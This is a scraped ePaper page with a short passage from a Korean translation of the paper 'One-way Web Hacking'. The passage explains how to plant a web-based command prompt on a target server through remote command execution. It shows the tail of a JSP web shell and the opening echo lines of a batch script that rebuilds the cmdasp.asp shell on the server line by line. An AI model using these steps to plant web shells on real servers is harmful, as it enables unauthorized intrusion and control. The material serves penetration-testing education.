12.07.2013 Views

One-way Web Hacking

One-way Web Hacking

One-way Web Hacking

SHOW MORE
SHOW LESS

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

%><br />

}<br />

<br />

}<br />

}<br />

catch(IOException e) {<br />

}<br />

<br />

<br />

e.printStackTrace();<br />

(Thanks to Shreeraj Shah for cmdexec.jsp)<br />

운영체제의 명령을 실행하도록 하는 어떤 웹 어플리케이션 프로그래밍 언어도 웹 기반의 command prompt를 만들 수 있다.<br />

4.1 <strong>Web</strong> 기반의 command prompt 설치하기<br />

원격 명령 실행을 사용하기 위해 우리는 "echo"와 같은 명령들을 실행할 수 있으며, 그리고 어떤 파일에 그<br />

출력물을 redirect할 수 있다. "echo" 명령을 여러 번 사용하면 우리는 파일을 만들 수 있으며, 원격 웹 서버에 한번에<br />

한 라인씩 만들 수 있다. 여기서 유일하게 필요한 것은 우리가 목표 웹 서버에 쓰기 가능한 디렉토리가 필요하다는<br />

것이다.<br />

4.1.1 create_cmdasp.bat<br />

다음은 4.0.2 섹션에서 나오는 cmdasp.asp 파일을 다시 만들기 위해 Windows DOS prompt상에서 실행될 수 있는 일련의<br />

명령이다.<br />

echo ^ cmdasp.asp<br />

echo Dim oScript, oScriptNet, oFileSys, oFile, szCMD, szTempFile >> cmdasp.asp<br />

echo On Error Resume Next >> cmdasp.asp

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!